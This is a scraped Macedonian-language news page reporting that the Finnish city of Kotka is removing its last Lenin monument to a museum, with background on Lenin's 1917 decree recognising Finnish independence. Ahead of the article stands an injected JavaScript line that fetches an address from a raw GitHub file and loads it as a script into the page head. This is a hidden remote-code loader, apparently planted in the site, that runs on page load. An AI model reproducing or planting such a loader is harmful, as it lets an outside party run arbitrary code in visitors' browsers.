;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Финска го демонтираше последниот споменик на Ленин - човекот кој го потпиша декретот за нивната независност - Антропол
АктуелноИнтернационално

Финска го демонтираше последниот споменик на Ленин – човекот кој го потпиша декретот за нивната независност

Властите на финскиот град Котка одлучија да го демонтираат последниот споменик на Владимир Илич Ленин во земјата, човекот кој дозволи финското кнежество да стане држава и го потпиша декретот за нејзина независност. Со одлука на градскиот совет, бронзената скулптура ќе биде пренесена во музејот Кименлааксо.

Идеите за уривање на споменикот во Финска беа актуелни и порано, но тогаш властите на Котка ги отфрлија ваквите иницијативи, сметајќи ги за недоволно поткрепени. Според британскиот „The Independent“, ставот на Градскиот совет се променил по одлуката на Финска да се приклучи на НАТО.

Демонтираниот споменик жителите на Талин ѝ го подариле на Котка во 1979 година. Покрај Котка, имаше уште една биста на Ленин во градот Турку, но пред неколку месеци и таа беше демонтирана и испратен во музеј, поради наводно „предизвикување негативни емоции“. – Така властите во Турку ја објаснија својата одлука.

Сега во Финска ќе останат само комеморативни плочи и барелефи во чест на рускиот револуционер. Иако Владимир Илич, ја има клучната улога за Финска да добие независност.

На 27 декември 1917 година, две фински делегации, социјал-демократската и буржоаската, заминале во Смолни за да разговараат за статусот на Финска во новата држава. Политичарите од Хелсинки, кои очекуваа противење од „руските максималисти“, биле изненадени. Финска која беше независно кнежество со широка автономија во рамките на Руската Империја, за првпат во руската историја од страна на Ленин добива поддршка „ЗА“ независност од поранешната империја, истото се случува без никаков воен судир или агресија.

Веќе на 15 (28) декември, Централниот комитет на Болшевичката партија ја одобрува независноста на Финска, а на 18 декември (31) 1917 година, Ленин го потпишал декретот за признавање на независноста на Финска од страна на Русија.